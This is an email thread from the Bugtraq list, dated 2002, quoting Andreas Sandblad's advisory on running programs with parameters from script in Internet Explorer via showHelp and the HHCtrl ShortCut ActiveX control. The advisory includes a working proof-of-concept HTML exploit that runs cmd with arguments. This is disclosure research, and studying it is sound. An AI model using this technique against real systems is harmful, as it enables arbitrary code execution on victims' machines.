Hi Adreas I just read his reply aswell and I dont agree with him on some points. Sure enough there are ways to execute code despite restictions such as you mention (not running activex components not marked safe for scripting) , like the http-equiv thingie where you drop a file (wich is really my icq thingie revamped) to a known location and then excute it. but it always required an external program to drop off the executable, your method works on a plain IE browser, making it far more dangerous. AFAIK It isn't so that being able to access the local zone automaticly gives you the possibility to execute arbitrary code. eventhough it is possible to get the paths to the TIF files as I explained already on bugtraq http://cert.uni-stuttgart.de/archive/bugtraq/2002/09/msg00126.html opening up some venues of exploitation, I dont believe anyone succeeded in making stuff run from there yet ( I know I haven't) However despite the fact that what you found out is incredibly significant I agree with microsoft and thor that its not a seperate vulnerability but rather a method of leveraging existing exploits. But where I am concerned I'd much rather see one of these finds then a 1000 method caching bugs. Very nice work indeed. I'll cc this to bugtraq for clarity sake -- jelmer ----- Original Message ----- From: "Andreas Sandblad" <sandblad@acc.umu.se> To: "jelmer" <jelmer@kuperus.xs4all.nl> Sent: Friday, November 08, 2002 4:34 PM Subject: Re: How to execute programs with parameters in IE - Sandblad advisory #10 > Hi Jelmer! > > I am having troubles understand how Thor Larholm reason when he says Local > computer zone = complete access to do whatever you want. > If you really were allowed to do whatever you want in that zone, how is > that scripting unsafe activeX controls are set to prompt in the Local > computer zone? > Ok, you can use the codebase attack, but if you can't get the location to > the temp. internet folders, then what harm can you do? You heard of a > legitim way of getting the exact path? I haven't... > > Btw, I really think you have done some very nice security research. > > Take care > > /Andreas > > On Fri, 8 Nov 2002, jelmer wrote: > > > nice one :) > > > > this is really bad.. > > > > ----- Original Message ----- > > From: "Andreas Sandblad" <sandblad@acc.umu.se> > > To: <bugtraq@securityfocus.com> > > Sent: Wednesday, November 06, 2002 8:48 PM > > Subject: How to execute programs with parameters in IE - Sandblad advisory > > #10 > > > > > > > > > > - Sandblad advisory #10 - > > > > > > ---------------------------------------------------------------- > > > Title: "How to execute programs with parameters in IE" > > > Date: [2002-11-06] > > > Software: Internet Explorer (webbrowser control) > > > Vendor: http://www.microsoft.com/ > > > Impact: Javascript in "Internet zone" may > > > execute programs with parameters _ _ > > > o' \,=./ `o > > > Author: Andreas Sandblad, sandblad@acc.umu.se (o o) > > > ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--- > > > > > > TABLE OF CONTENTS: > > > ================== > > > Introduction ................................................. 1 > > > Vendor status ................................................ 2 > > > Details ...................................................... 3 > > > Exploit ...................................................... 4 > > > Disclaimer ................................................... 5 > > > Feedback ..................................................... 6 > > > > > > > > > (1) INTRODUCTION: > > > ================= > > > By default all internet contents such as homepages are placed in the > > > "Internet zone". Local content viewed in IE runs in the "Local computer > > > zone" with less restrictions. > > > > > > In the past we have seen many vulnerabilities where script in the > > > "Internet zone" could access the "Local computer zone". The script could > > > do actions like: > > > - Read local files if the exact path is known and file can be opened by > > > IE. > > > - Execute local programs (exact path required) WITHOUT parameters using > > > the codebase attack. > > > > > > It will be shown in this document how script in the "Local computer zone" > > > can actually be designed to run arbitrary programs WITH parameters (exact > > > path not needed). The technique used may open up far more dangerous > > > attacks than seen before. > > > > > > > > > (2) VENDOR STATUS: > > > ================== > > > Microsoft was initially contacted 2002-10-04. After several mail > > > exchanges, their final response were that the technique used to run > > > programs with parameters from the "Local computer zone" was no security > > > vulnerability. A fix should instead be applied for all possibilities for > > > content in the "Internet zone" to access the "Local computer zone". > > > > > > > > > (3) DETAILS: > > > ============ > > > Javascript can use the showHelp command to do one of the following two > > > operations: > > > 1. Open a local compiled help file (.chm) in a separate winhelp window. > > > 2. Open an url (must begin with http://) in a separate winhelp window. > > > Script in window opened as (1) may use the shortcut command (activeX > > > control) to run programs with parameters, but (2) may not. Nothing > > > strange, normal security restrictions. > > > > > > After some investigations I found a way to make (2) use the shortcut > > > command. The following must be done: > > > 3. Script in (2) gets access to the "Local computer zone". > > > 4. Script in (2) changes url to "mk:@MSITStore:C:" or similiar. > > > 5. A local compiled help file must have been opened since IE was first > > > started. Any help file will do. For example showHelp("iexplore.chm"). > > > > > > In order to achieve (3) there are several nonpatched "cross site/zone > > > scripting" vulnerabilites to use. To achieve (4) a new window must be > > > created from (2). By using the "opener" object it is possible to keep > > > control of the winhelp window (2) even after the url is changed. (5) is > > > trivial to achieve and will not affect the winhelp window for (2), since > > > it is opened in a different window by default. > > > > > > Before MS02-055 was released by Microsoft the above were a lot more easier > > > to perform. (3) and (4) could then be skipped. > > > > > > > > > (4) EXPLOIT: > > > ============ > > > The exploit uses a nonpatched "cross site/zone scripting" vulnerability > > > published by Liu Die Yu 2002-10-01 to Bugtraq: > > > http://online.securityfocus.com/archive/1/293692 > > > It could also be possible to use one of the many "cross site/zone > > > scripting" vulnerabilities Greymagic found: > > > http://sec.greymagic.com/adv/gm012-ie/ > > > Recently I reported a new "cross site/zone scripting" vulnerability to > > > Microsoft that could also be used. But since no patch is yet produced, > > > information about it will not be published. > > > > > > In order for not having to put script in 3 separate files I have combined > > > them into one single file. The script will check for text after the # sign > > > in the url to determine what to perform (url's hash). If your computer is > > > heavily loaded, then the value of the setTimeout timer has to be > > > increased. The timer is needed because the "mk:@MSITStore:C:" url is not > > > set directly by IE. > > > > > > INSTRUCTIONS: > > > 1. Copy the content below and place it in a html file. > > > 2. REMOVE THE * FROM THE SCRIPT TAG. > > > 3. Place the file on a remote webserver and load it in IE (URL MUST START > > > WITH HTTP://). > > > 4. The script will open up a dos window and display a line of text, create > > > the file c:/vulnerable.txt (write permission required) and start winmine > > > (this excellent game must exist). The help window for IE will not be > > > closed. > > > > > > TESTED: > > > Win2000 pro, XP, IE 6 (latest patches). > > > > > > --------------------------- CUT HERE --------------------------- > > > <*script> > > > // "How to execute programs with parameters in IE", 2002-11-06 > > > // Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se > > > prog = 'cmd'; > > > args = '/k echo You are vulnerable (Sandblad #10) & '+ > > > 'echo Sandblad #10 > c:/vulnerable.txt & winmine'; > > > > > > if (!location.hash) { > > > showHelp(location+"#1"); > > > showHelp("iexplore.chm"); > > > blur(); > > > } > > > else if (location.hash == "#1") > > > open(location+"2").blur(); > > > else { > > > f = opener.location.assign; > > > opener.location="res:"; > > > f("javascript:location.replace('mk:@MSITStore:C:')"); > > > setTimeout('run()',1000); > > > } > > > function run() { > > > f("javascript:document.write('<object id=c1 classid=clsid:adb"+ > > > "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+ > > > "=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+ > > > "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+ > > > "-00aa003b7a11><param name=Command value=Close></object>')"); > > > f("javascript:c1.Click();c2.Click();"); > > > close(); > > > } > > > </script> > > > --------------------------- CUT HERE --------------------------- > > > > > > > > > (5) Disclaimer: > > > =============== > > > Andreas Sandblad is not responsible for the misuse of the > > > information provided in this advisory. The opinions expressed > > > are my own and not of any company. In no event shall the author > > > be liable for any damages whatsoever arising out of or in > > > connection with the use or spread of this advisory. Any use of > > > the information is at the user's own risk. > > > > > > > > > (6) Feedback: > > > ============= > > > Please send suggestions and comments to: _ _ > > > sandblad@acc.umu.se o' \,=./ `o > > > (o o) > > > ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--- > > > Andreas Sandblad, student in Engineering Physics and > > > Computing Science at Umea University, Sweden. > > > -/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/-- > > > > > > > > > > > > > > > > > > -- > _ _ > o' \,=./ `o > (o o) > -ooO--(_)--Ooo- > > >
